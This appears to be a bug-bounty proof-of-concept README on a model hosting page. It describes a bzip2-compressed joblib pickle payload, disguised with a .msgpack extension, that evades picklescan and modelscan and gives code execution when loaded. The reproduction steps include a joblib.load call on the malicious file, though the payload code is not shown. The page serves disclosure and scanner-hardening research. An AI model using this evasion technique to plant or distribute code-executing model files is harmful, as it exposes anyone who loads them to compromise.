MessagePack (.msgpack) MFV PoC β€” Authorized Security Research

Authorization: huntr.com / Protect AI MFV bug bounty program. All work local in a Python venv. Responsible disclosure only. Human-submitted.

Summary

Format: MessagePack (.msgpack) Bypass: picklescan 1.0.4 + modelscan 0.8.8 Modes bypassed: all 4 (direct + directory scan for both scanners) RCE via: joblib.load('malicious.msgpack') Technique: bzip2-compressed joblib payload Tested: 2026-06-25

Files

  • malicious.msgpack β€” bzip2-compressed joblib payload with .msgpack extension
  • poc-msgpack.py β€” reproduction script
  • README.md β€” this file

Reproduction

pip install picklescan modelscan joblib

python3 poc-msgpack.py

picklescan -p malicious.msgpack
picklescan -p .
modelscan  -p malicious.msgpack
modelscan  -p .

python3 -c "
import joblib
print('--- BEFORE LOAD ---')
joblib.load('malicious.msgpack')
print('--- AFTER LOAD ---')
"
Downloads last month

-

Downloads are not tracked for this model. How to track
Inference Providers NEW
This model isn't deployed by any Inference Provider. πŸ™‹ Ask for provider support